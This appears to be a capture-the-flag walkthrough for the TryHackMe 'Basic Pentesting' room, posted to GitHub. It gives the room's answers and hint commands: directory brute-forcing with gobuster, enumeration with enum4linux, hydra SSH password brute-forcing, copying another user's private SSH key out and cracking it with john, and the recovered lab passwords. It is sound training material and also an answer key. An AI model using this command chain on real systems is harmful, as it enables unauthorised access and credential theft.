-
Notifications
You must be signed in to change notification settings - Fork 0
/
Basic Pentesting
48 lines (34 loc) · 1.28 KB
/
Basic Pentesting
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#Task 1 Web App Testing and Privilege Escalation
- What is the name of the hidden directory on the web server(enter name without /)?
hint: gobuster dir -u http://10.10.79.249/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
developement (Status: 301)
developement
- What is the username?
hint: /usr/share/enum4linux/enum4linux.pl -a $ip | tee enum4linux.log
jan
- What is the password?
hint: hydra -l jan -P /home/gd/Downloads/rockyou.txt 10.10.79.249 ssh
armando
- What service do you use to access the server(answer in abbreviation in all caps)?
ssh
- What is the name of the other user you found(all lower case)?
hint: ls /home/
ls /home/kay -als
pass.bak
kay
- What is the final password you obtain?
hint: cd /home/kay/.ssh
scp id_rsa $user@$localip:/home/
from kali machine
locate ssh2john
/usr/share/john/ssh2john id_rsa > hash.txt
john --wordlist=/home/gd/Download/rockyou.txt hash.txt
john hash.txt --show
ssh -i id_rsa kay@$ip
beeswax
cat /home/kay/pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
https://tryhackme.com/room/basicpentestingjt
https://gitlab.com/gadoi1/tryhackme/-/tree/master/BasicPentesting
https://danishzia.medium.com/tryhackme-basic-pentesting-write-up-d6e3d551c0f7
https://clearinfosec.com/basic-pentesting-walkthrough-tryhackme/